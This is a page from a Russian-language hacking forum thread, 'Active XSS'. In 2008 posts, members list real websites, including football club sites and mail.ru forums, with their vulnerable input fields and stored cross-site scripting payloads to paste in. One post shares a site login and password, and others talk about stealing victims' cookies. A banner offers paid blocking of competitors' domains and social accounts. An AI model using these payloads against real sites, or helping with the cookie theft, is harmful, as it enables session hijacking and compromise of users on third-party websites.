УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Активные Xss

Страница 16 из 41

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#151

19.03.2008, 01:54

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

domex.ru

Уязвимые поля:
Площадь (м2)
Цена

В уязвимых полях пишем: "><script>alert()</script>

#152

21.03.2008, 00:55

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

bloggerswap.com

Заводим акк на этом ресурсе

затем редактируем инфо Edit Account Details

в поле Website Name: добавим наш код:

">'><SCRIPT>alert(4)</SCRIPT>

жмем edit my account

#153

23.03.2008, 18:00

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

Цитата:

Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне привет Дон \

http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25

Добавим новое сообщение

<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня

+++++++++++++++++++++++++++++++++++

Последний раз редактировалось xcedz; 23.03.2008 в 18:16..

#154

24.03.2008, 12:52

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

Отправить сообщение для MaSter GeN с помощью ICQ

ehbsr.com
не люблю я все таки американцев

Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:

Код:

<img"""><script>alert(/ЛЯ ПА ПАМ/)</script>

#155

26.03.2008, 01:51

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства
В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос
В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт
В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт

Последний раз редактировалось Tigger; 26.03.2008 в 02:35..

#156

30.03.2008, 16:03

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

Провел на форуме:
2808062

Репутация: 155

хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт

-------------------------------

"Знаменитый" украинский хотинг файлов upload.com.ua

Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
Получаем активную xss

PS upload уже профиксили

Последний раз редактировалось .Striker; 31.03.2008 в 16:56..

#157

30.03.2008, 23:30

Buffalon

Постоянный

Регистрация: 22.03.2008

Сообщений: 325

Провел на форуме:
1208132

Репутация: 63

http://ul-rocksite.info
Переходит на страницу чата:
http://ul-rocksite.info/index.php?page=chat
И в чате рисуем следующее:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
OPera Версия 9.23

Последний раз редактировалось Buffalon; 31.03.2008 в 07:06..

#158

31.03.2008, 14:42

AJAY

Новичок

Регистрация: 25.03.2008

Сообщений: 1

Провел на форуме:
10969

Репутация: 2

Цитата:

вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)

#159

08.04.2008, 23:06

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

#160

09.04.2008, 00:54

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

кстате и на forum.lady.mail.ru тоже работает)

Страница 16 из 41

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход